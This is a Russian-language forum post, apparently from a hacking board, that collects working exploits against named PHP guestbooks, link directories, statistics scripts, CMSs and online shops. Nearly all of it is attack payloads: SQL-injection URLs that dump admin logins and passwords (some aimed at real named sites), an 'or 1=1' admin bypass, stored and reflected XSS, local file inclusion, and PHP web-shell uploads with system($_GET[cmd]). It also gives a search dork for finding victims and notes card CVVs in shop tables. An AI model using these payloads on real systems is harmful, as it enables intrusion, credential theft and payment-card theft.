В своё время начал собирать уязвимости для себя. В общем, кому надо забирайте - _http://slil.ru/24435960.
siteframe SQL inj http://site/user.php?id=-1+union+select+1,2,3,4,concat(VERSION(),0x3a,DATABASE(),0x3a,USER())/* Скромно, но полезно
WR-Guest 1.0 Активная XSS: При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре соообщений.
SimPoll v.1.0 Активная XSS: админка управления опросами обычно открыта (файл test_poll_admin.php) в помощью админки можно изменить текущий опрос. при введении текста опроса данные не фильтруются. возможна вставка своего ява-скрипта google dork: inurl:test_poll_results.php
cartkeeper SQL-inj hxxp://ckgold.cartkeeper.com/item.php?item_id=-1&category_id=27+group+by+tbl_item.item_id+union+select+1,version(),3,user()/*
Скрипты статистики посещений: 1. Сервер статистики ГелиоСтат Активная XSS: В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики. 2. pronuserinfoSQL v1.2 Активная XSS: В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики. SQL инъекция: На странице view.php в поле "отследить последних..." вводим: ' union select 1,2,3,4,5,6/* 3. SEbotInfo 2.0 Активная XSS: На странице в sebot.php переменные: HTTP_USER_AGENT вписываем Yandex. HTTP_HOST вписываем тело скрипта. Скрипт будет выполняться при просмотре статистики на странице sebotinfo.php. 4. BotsInfo v0.03 Активная XSS: На странице в write.php переменные: HTTP_USER_AGENT вписываем Yandex. HTTP_HOST вписываем тело скрипта. Скрипт будет выполняться при просмотре статистики на странице botsinfo.php.
EJ3 TOP 1.4 Заливка шелла: При добавление ссылки на сайт в поле Banner URL вводим: '; ?> <?php Код шелла ?> <?php $a=' После ввода данных получаем ID: К примеру: 1181902021 Шелл будет доступен по адресу: http://site.ru/data/1181902021info.php http://site.ru/data/[id]info.php ----------------------------------------------------------- Ссылки и каталоги ссылок 1. Link Database SQL инъекция: http://site.ru/links.php?category=-1+union+select+1,2,3,4,5,6/* 2. Link Up SQL инъекция: http://site.ru/category.php?category=-1+union+select+1,2/* Доступ в админку: http://site.ru/admin/index.php В поле Username вводим: ' or 1=1 /* 3. SM(links) v2.0 Отсутствие .htaccess: Смотрим файл config.inc - в нём хранятся логин и пароль к админке: http://site.ru/config.inc 4. xLink v2.1 Пассивная XSS: http://site.ru/poisk.php?poisk='><script>alert();</script> 5. My Link 1.00 Активная XSS: При добавление ссылки в поле Имя ссылки или Описание ссылки вводим скприпт, скрипт будет выполняться при просмотре ссылок. 6. Quick Link Активная XSS: При добавление категории (Add Category) вводим скрипт, скрипт будет выполняться при просмотре ссылок.
scozbook 1.1 Code: http://site.ru/admin/edit.php?id=-2'+union+select+1,convert(concat(adminname,char(58),adminpass,char(58),adminemail)+using+cp1251),3,4,5,6,7,8,9,10+from+scozbook_admin+limit+0,1/*
Гостевые книги: FastStarter Активная XSS: Вписываем скрипт в поле name. Mandralivre 4.1 Активные XSS: Вписываем скрипт в поля Votre nom, Votre email, Votre site web. hwdeGUEST 2.0 Активная XSS: Вписываем скрипт в поле Name.
Закрытая гостевая книга v 1.0 (websmith) вход в админку без пароля Code: www.site.ru/admin/index.php гостевуха стоит 20 баксов, а в демке нехватаит возможности изменения данных. Вполне возможно что в полной версии можно встретить XSS _________________ guest v1.1 если криво настроены права то можно прочитать файл с логином и паролем Code: www.site.ru/passwd.dat все это дело выглядит след образом PHP: <?php $Password['admin'] = "d8578edf8458ce06fbc5bb76a58c5ca4"; ?> логин - admin пароль(мд5) - d8578edf8458ce06fbc5bb76a58c5ca4 заливка шелла выполняеться из админ панели Code: http://site.ru/admin.php?design в поле файла header.inc.php вписываем PHP: <?php system($_GET[cmd]); ?> и выполняем Code: http://site.ru/design/header.inc.php?cmd=команда
немного PHP-inj. PHP::HTML 0.6.4 (PHP-inj) phphtml.php?htmlclass_path=[/color] [size=3][b][color=green...d_adm.php?SETS[path][physical]=[file][/color]
AMGuests0.3.0 1) Локальный инклуд файлов. Требуется: register_globals = On magic_quotes = Off Code: http://site.ru/gb/signin.php?sent=1&AMG_serverpath=FILE%00 2) Пассивные XSS. Требуется: register_globals = On Code: http://site.ru/gb/signin.php?AMG_signin_name="><script>alert(1);</script> http://site.ru/gb/signin.php?AMG_signin_location="><script>alert(1);</script> http://site.ru/gb/signin.php?AMG_signin_icq="><script>alert(1);</script> http://site.ru/gb/signin.php?AMG_signin_email="><script>alert(1);</script> http://site.ru/gb/signin.php?AMG_currentlanguage[signin_form_userimage]="><script>alert(1);</script>
SQL-inj в QuickEstore Существует возможность провести sql-инъекцию из-за недостаточной обработки входных данных в параметре CFTOKEN в скрипте insertorder.cfm. Пример: Кол-во полей везде разное, но в основном от 15 до 19. Есть и cvv, но он в таблице PARAMS и есть почему-то не везде, но можно вывести его и через последние заказы. Вот всё остальное (после TABLE таблица, ниже колонки в ней): На счет версии не знаю, но в гугле на запрос каждая вторая уязвима. P.S.: Вроде ничё не забыл
SQL-инъекция в CMS Koobi CMS Koobi v4.2 v5.8 v6.1 со страницей скачки файлов возможно другие версии(тестировал только на этих) http://site/index.php?area=1&p=downloads&categ=-1+union+select+1,concat(email,0x3a,pass),3+from+table_name/* Наиболее вероятные зачения table_name: Code: koobi4_user kpro_user kpro5_user kpro6_user для авторизации нужны email и пароль Пароль - дважды хэшированный md5: md5(md5($pass))
Open Guestbook 0.5 Скачать можно здесь: http://sourceforge.net/project/showfiles.php?group_id=82463 1) Пассивная XSS Code: http://localhost/header.php?title=</title><script>alert(123);</script> 2) SQL инъекция/активная XSS В скрипте process.php из-за отсутсвия фильтрации можно провести инъекцию в запросе INSERT... При добавление сообщения в поле Message вводим: Code: ','','','', '', '', '', '', '', '><script>alert(111);</script>', '', '', '')/* В результате получим выполнение нашего скрипта при просмотре сообщений, т.е. получаем активную xss.
artCifra CMS v4.5 Уязвимость в cookie. Имя куки artcifraSES. Возможность проведения SQL инъекции. Пример: Изменяем содержимое куки на: Code: ')+union+select+column1,column2+from+some_table
CONTENTdm Пассивные XSS: 1) в скрипте results.php уязвимы переменная CISOBOX1, CISOBOX2 и т.д. кстати найдена мной 05.07.2007 а в багтраках появилась только 06.08.2007, так что если и баян, то свой, так сказать для полноты сюда запостил 2) во многих скриптах в переменной CISOROOT примеры: Code: http://contentdm.nitle.org/cdm4/item_viewer.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E Code: http://mdc.cbuc.cat/cdm4/document.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E
A-ShopВерсии: 4.4.1(возможно и более ранние) - 4.7.х(last) SQL-инъекция с доступом в user и с незашифренными пасами. Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2. Пример: Code: http://www.the123d.com/shop/catalogue.php?cat=-21+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+user/* Админка: http://www.the123d.com/shop/admin/login.php Отправил на [email protected] должны скоро выложить.